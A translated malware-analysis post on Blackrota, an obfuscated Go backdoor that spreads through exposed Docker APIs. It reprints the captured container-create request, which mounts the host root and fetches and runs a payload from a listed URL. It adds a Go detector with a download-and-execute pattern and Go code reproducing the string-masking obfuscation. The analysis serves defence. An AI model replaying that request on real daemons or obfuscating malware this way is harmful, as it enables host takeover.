Blackrota, a heavily obfuscated backdoor written in Go

The most obfuscated Go ELF malware we've seen to date.





Foreword

Recently, a malicious backdoor written in Go, which spreads by exploiting unauthorized access to the Docker Remote API, was caught by our Anglerfish honeypot.





We named it Blackrota after its C2 domain, blackrota.ga.





At present Blackrota exists only for Linux, as ELF binaries for the x86 and x86-64 architectures.





Blackrota is configured and compiled from geacon, a Go implementation of the CobaltStrike Beacon. It behaves as a Beacon and talks to a CobaltStrike team server, which uses it to control the compromised host.

geacon, however, implements only a subset of the original Beacon's commands:

  • CMD_SHELL: execute a shell command;
  • CMD_UPLOAD: upload files;
  • CMD_DOWNLOAD: download a specified file;
  • CMD_FILE_BROWSE: browse files (directory listing);
  • CMD_CD: change directory;
  • CMD_SLEEP: set the sleep delay;
  • CMD_PWD: return the current directory;
  • CMD_EXIT: exit.





In addition to being built from geacon, Blackrota is obfuscated with gobfuscate. gobfuscate is an open-source obfuscation tool for Go that rewrites the Go source code before compilation in the following ways:

  • package names are replaced with random hashes;
  • global variable and function names are replaced with random hashes;
  • type names are replaced with random hashes;
  • method names are replaced with random hashes;
  • string literals are replaced with XOR-encoded byte arrays.

After gobfuscate has run, every string is XOR-encoded with a random mask at compile time and decoded by a XOR routine at run time, so no plaintext string survives in the binary.





Reverse engineering a Go binary is harder than a C binary to begin with: it is statically linked and large, the Go runtime and every imported package are compiled in, and the calling convention, the string and slice layouts and interface dispatch all differ from what C-oriented tooling expects. What keeps this manageable is the metadata a Go binary carries, which is what analysts and Go-aware tools lean on.

Concretely, a Go binary contains two kinds of runtime metadata: RTSI (Runtime Symbol Information), which maps code addresses to function names and source file paths and is used by the runtime for stack traces and garbage collection, and RTTI (Runtime Type Information), which describes every type in the program and is needed for reflection and interfaces. Neither can simply be stripped without breaking the program, so even a stripped Go binary normally gives up its function names, types and source paths, and tools such as go_parser rebuild the picture from them.

Blackrota went through gobfuscate, so the names that RTSI and RTTI still faithfully point at are random hashes, and every string literal is XOR-encoded. The metadata is intact but meaningless, and the usual shortcut of reading function names and strings to understand a Go program no longer works.

This makes Blackrota the most heavily obfuscated Go ELF malware we have seen to date, and it is worth walking through how we analyzed it.





Propagation of Blackrota

Blackrota spreads by exploiting unauthorized access to the Docker Remote API. The captured request that creates the container and runs the payload:





POST /v1.37/containers/create HTTP/1.1
Host: {target_host}:{target_port}
User-Agent: Docker-Client/19.03.7 (linux)
Content-Length: 1687
Content-Type: application/json

{"Env":[],"Cmd":["/bin/sh","-c","rm ./32 ; wget https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32;chmod 777 32; nohup ./32 \u003c/dev/null \u003e/dev/null 2\u003e\u00261 \u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}
      
      



The request bind-mounts the host's root filesystem into the container (Binds: /:/mnt), then downloads the payload, marks it executable (chmod 777) and runs it detached with nohup. The 32-bit and 64-bit Blackrota samples were hosted at the following URLs:





https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32
https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/64
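As an added example that is not part of the original post, the following Go program inspects a Docker Engine API /containers/create body the way a honeypot or an API gateway in front of the daemon could, flagging the two traits that make the captured request above dangerous: a bind mount of a sensitive host path and a download-and-execute shell command. Both request bodies embedded in it are constructed for the example; the first is modeled on the captured request with the payload URL replaced by a placeholder host, the second is an ordinary web-server container for contrast.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// createRequest holds the fields of a Docker Engine API
// POST /containers/create body that matter for this check.
type createRequest struct {
	Image      string   `json:"Image"`
	Cmd        []string `json:"Cmd"`
	HostConfig struct {
		Binds      []string `json:"Binds"`
		Privileged bool     `json:"Privileged"`
	} `json:"HostConfig"`
}

// sensitiveHostPaths are bind-mount sources that hand the container
// control over the host (the root filesystem or the Docker socket).
var sensitiveHostPaths = []string{"/", "/var/run/docker.sock"}

// downloadExec matches a fetch followed by a chmod/execution step, the
// shape of the "wget ...; chmod 777 32; nohup ./32" command seen above.
var downloadExec = regexp.MustCompile(`\b(wget|curl)\b.*\b(chmod|nohup|sh|bash)\b`)

// Inspect parses a /containers/create body and returns one message per
// suspicious trait; an empty slice means nothing stood out.
func Inspect(body []byte) ([]string, error) {
	var req createRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return nil, fmt.Errorf("invalid create request: %w", err)
	}
	var findings []string
	for _, bind := range req.HostConfig.Binds {
		src := strings.SplitN(bind, ":", 2)[0]
		for _, p := range sensitiveHostPaths {
			if src == p {
				findings = append(findings, "sensitive host path bind-mounted: "+bind)
			}
		}
	}
	if req.HostConfig.Privileged {
		findings = append(findings, "privileged container requested")
	}
	if cmd := strings.Join(req.Cmd, " "); downloadExec.MatchString(cmd) {
		findings = append(findings, "download-and-execute command: "+cmd)
	}
	return findings, nil
}

// capturedCreate is a constructed body modeled on the request Blackrota
// sends; the payload URL is a placeholder, not the real hosting location.
const capturedCreate = `{"Env":[],"Cmd":["/bin/sh","-c","rm ./32 ; wget https://example.invalid/payload/32;chmod 777 32; nohup ./32 \u003c/dev/null \u003e/dev/null 2\u003e\u00261 \u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}}`

// benignCreate is a constructed, ordinary web-server container for contrast.
const benignCreate = `{"Cmd":["nginx","-g","daemon off;"],"Image":"nginx","HostConfig":{"Binds":["/srv/www:/usr/share/nginx/html:ro"]}}`

func main() {
	for _, body := range []string{capturedCreate, benignCreate} {
		findings, err := Inspect([]byte(body))
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("%d finding(s)\n", len(findings))
		for _, f := range findings {
			fmt.Println("  -", f)
		}
	}
}
```

The real fix is not to expose the Docker API over TCP without TLS client authentication at all; a check like this is for spotting abuse of daemons that already are exposed.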
      
      



Obfuscation of Blackrota

First, let's see how Blackrota was built. go_parser, an IDAPro plugin for Go binaries, reports that the sample was compiled with Go 1.15.3 and that GOROOT was "/usr/local/Cellar/go/1.15.3/libexec", a Homebrew path, so the build machine was a Mac. The package, function, type and method names it recovers, however, are not the real ones: they are all random strings of letters.





For example, here are some of the source file paths recovered from the binary (partial list). The directory components are 20-letter strings over the letters a to p, the hashed package names gobfuscate emits, while the file names survive unchanged and match geacon's source files (http.go, packet.go, commands.go, sysinfo_linux.go, rsa.go, aes.go, config.go); the /var/folders/.../T/ prefix is the macOS temporary directory in which gobfuscate copies and rewrites the sources before building:





/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/main.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/http.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/packet.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/commands.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/sysinfo_linux.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/meta.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/setting.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/req.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/resp.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/dump.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/pmdjfejhfmifhmelifpm/util.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rsa.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rand.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/aes.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/eepmoknkdieemfhjjjgl/config.go

      
      



Recovering Blackrota's function names

With every name hashed, the function list in IDAPro is just a wall of names like the ones above, and the strings window contains nothing readable. The way in is that Blackrota is compiled from geacon, whose source is public: the same source compiled with the same toolchain for the same target yields essentially the same machine code, so a clean geacon build can provide FLIRT signatures for the functions in Blackrota that came from geacon, even though their names have changed.





To recover the function names of Blackrota we did the following:

  1. compile geacon ourselves, with the same Go version and target platform as Blackrota and without obfuscation;
  2. load that geacon binary in IDAPro and run idb2pat.py to generate a pattern file (geacon.pat) from it;
  3. run sigmake from the IDA Flair tools on the pattern file to build a signature file (geacon.sig);
  4. apply geacon.sig to the Blackrota sample in IDAPro, so that the functions matching the signatures get their geacon names.

It works! After applying the signatures, the functions that came from geacon are recognized and renamed, and the backdoor's logic can be read against geacon's source.





Decrypting Blackrota's strings

Once the function names are back, Blackrota reads largely like a geacon build, but its strings are still encoded, and geacon's source does not help with those, since the encoding was added by gobfuscate.

Every string in Blackrota is decoded by its own XOR routine. gobfuscate replaces each string literal with a function literal that holds two byte arrays, a random mask and the masked string, XORs them element by element at run time and returns the result. Each literal gets its own mask and its own copy of the loop, so the binary ends up with one XOR routine per string rather than a single decryption function to hook. A typical one is easy to spot in the decompiler.

Because the routines all have the same shape, the strings can be recovered by script: find each XOR routine, extract the two arrays, XOR them and write the plaintext back as a comment at the call site. With that done, the C2 address, the command strings and the rest of the configuration become readable.
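As an added example, not code from the original post or from gobfuscate itself, the Go program below reproduces both sides of the string transformation described above. maskString is the compile-time step (random mask, XOR with the literal), emitClosure renders the immediately-invoked function literal that replaces the string at each use site (the shape, with mask, maskedStr and a XOR loop, is modeled on gobfuscate's published source; the exact formatting of real gobfuscate output is an assumption), and unmask is the analyst's side, recovering the plaintext from the two arrays lifted from the binary. The input strings are constructed for the example.

```go
package main

import (
	"crypto/rand"
	"fmt"
	"strings"
)

// maskString is the compile-time side of gobfuscate's string encoding:
// a random mask as long as the literal is generated and the literal is
// XORed with it. Only (mask, masked) reach the binary; the plaintext
// does not.
func maskString(s string) (mask, masked []byte, err error) {
	mask = make([]byte, len(s))
	if _, err = rand.Read(mask); err != nil {
		return nil, nil, err
	}
	masked = make([]byte, len(s))
	for i := range mask {
		masked[i] = mask[i] ^ s[i]
	}
	return mask, masked, nil
}

// byteList renders a byte slice as the body of a Go composite literal.
func byteList(bs []byte) string {
	parts := make([]string, len(bs))
	for i, b := range bs {
		parts[i] = fmt.Sprintf("0x%02x", b)
	}
	return strings.Join(parts, ", ")
}

// emitClosure renders the immediately-invoked function literal that
// gobfuscate substitutes for a string at each use site. The shape is
// modeled on gobfuscate's source; the exact formatting is an assumption.
func emitClosure(mask, masked []byte) string {
	var b strings.Builder
	b.WriteString("func() string {\n")
	fmt.Fprintf(&b, "\tmask := []byte{%s}\n", byteList(mask))
	fmt.Fprintf(&b, "\tmaskedStr := []byte{%s}\n", byteList(masked))
	fmt.Fprintf(&b, "\tres := make([]byte, %d)\n", len(mask))
	b.WriteString("\tfor i, m := range mask {\n\t\tres[i] = m ^ maskedStr[i]\n\t}\n")
	b.WriteString("\treturn string(res)\n}()")
	return b.String()
}

// unmask is the analyst's side: given the two arrays lifted from the
// binary (or read off the decompiled closure), recover the plaintext.
// It is exactly the loop the closure runs, which is why a script that
// finds every such routine and XORs its two arrays decodes all strings.
func unmask(mask, masked []byte) string {
	if len(mask) != len(masked) {
		return ""
	}
	res := make([]byte, len(mask))
	for i, m := range mask {
		res[i] = m ^ masked[i]
	}
	return string(res)
}

func main() {
	// Constructed input: the C2 domain named in the post.
	mask, masked, err := maskString("blackrota.ga")
	if err != nil {
		panic(err)
	}
	fmt.Println(emitClosure(mask, masked))
	fmt.Printf("decoded: %q\n", unmask(mask, masked))
}
```

The point of the example is the asymmetry: the transformation hides strings from a `strings` run and from the IDA strings window, but since the mask sits next to the ciphertext and the loop is the same everywhere, a pattern match plus one XOR per routine undoes all of it.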





One more detail of Go itself helps here: gobfuscate hashes the import path of the main package (as the main.go path above shows), but a Go program's entry package must still be named main and the runtime still calls main.main, so the entry point can be found by name even in a fully obfuscated binary. We thank @joakimkennedy for the pointer about main.

A similar picture was seen earlier in the Go-based EKANS ransomware, whose obfuscated function names look much like Blackrota's.





The obfuscation technique used in Blackrota and EKANS creates new challenges for disassembly and analysis. As Go becomes more popular and more malware is written in it, we will keep watching how this develops.





IoCs





MD5:





e56e4a586601a1130814060cb4bf449b
6e020db51665614f4a2fd84fb0f83778
9ca7acc98c17c6b67efdedb51560e1fa
      
      



C&C:





blackrota.ga    165.227.199.214    ASN: 14061 | DigitalOcean, LLC
      
      



PS: The article is published with the author's permission. This is my first translation, so please be understanding.







